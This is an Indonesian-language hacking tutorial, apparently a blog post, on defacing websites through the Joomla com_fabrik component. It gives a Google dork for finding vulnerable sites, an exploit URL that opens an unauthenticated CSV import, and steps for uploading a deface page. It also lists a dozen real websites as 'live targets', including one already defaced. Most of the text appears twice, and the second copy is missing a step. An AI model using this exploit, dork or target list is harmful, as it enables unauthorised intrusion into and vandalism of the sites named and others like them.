Hallo Sahabat,,,Kali ini Saya akan Share teknik Deface Com_Fabrik.
Teknik ini sebenar'y sangat gampang dan cocok buat seorang pemula.
Ok langsung ke tkp.
yang di perlukan:
- Dork
- Script deface
- kesabaran
- kopi + rokok :v
Langkah-Langkah:
1. Cari target dengan google dork ini
inurl:viewTable?cid= site:com
*Site: Boleh diganti apa saja. ( contoh: ru /it /ac /za /fi dll )
*Google Dork, kreasikan sendiri.
2. Pilih salah satu web & buka web tersebut
3 Setelah web dibuka, maka akan muncul "Sorry this form is not publish." dan masukkan exploit ini
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
contoh: http://www.avismacerata.it/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4.klik Choose File & pilih script deface dan lalu klik tombol import CSV
Live Target:
- http://www.centroolisticoitaliano.it/
- http://www.nordnetimmobiliare.it/
- http://www.lmilogistica.it/
- http://www.ready4english.it/
- http://graphein.it/
- http://www.montagneinsicilia.it/
- http://www.bbmoccia.it/
- http://ess-vw.nu-line.com.au/
- http://www.clemente.it/
- http://www.collinamacchine.it/
- http://www.dalforner.it/
- http://www.avismacerata.it/
by:vuln_404
http://www.avismacerata.it/media/SulawesiV2
Teknik ini sebenar'y sangat gampang dan cocok buat seorang pemula.
Ok langsung ke tkp.
yang di perlukan:
- Dork
- Script deface
- kesabaran
- kopi + rokok :v
Langkah-Langkah:
1. Cari target dengan google dork ini
inurl:viewTable?cid= site:com
*Site: Boleh diganti apa saja. ( contoh: ru /it /ac /za /fi dll )
*Google Dork, kreasikan sendiri.
2. Pilih salah satu web & buka web tersebut
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
contoh: http://www.avismacerata.it/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4.klik Choose File & pilih script deface dan lalu klik tombol import CSV
5. Setelah proses upload Script selesai, maka akan ada tampilan seperti gambar diatas atau mungkin berbedadengan gambar diatas. lalu buka Script'y.www.site.com/media/nama script kamu.html
contoh: http://www.avismacerata.it/media/sulawesi.html
*Jika berhasil, akan muncul tampilan script milik anda. jika tidak berhasil, berarti cari target lain.
http://www.avismacerata.it/media/Sulawesi.html
http://www.avismacerata.it/media/Sulawesi.html
Live Target:
- http://www.centroolisticoitaliano.it/
- http://www.nordnetimmobiliare.it/
- http://www.lmilogistica.it/
- http://www.ready4english.it/
- http://graphein.it/
- http://www.montagneinsicilia.it/
- http://www.bbmoccia.it/
- http://ess-vw.nu-line.com.au/
- http://www.clemente.it/
- http://www.collinamacchine.it/
- http://www.dalforner.it/
- http://www.avismacerata.it/
by:vuln_404
http://www.avismacerata.it/media/SulawesiV2
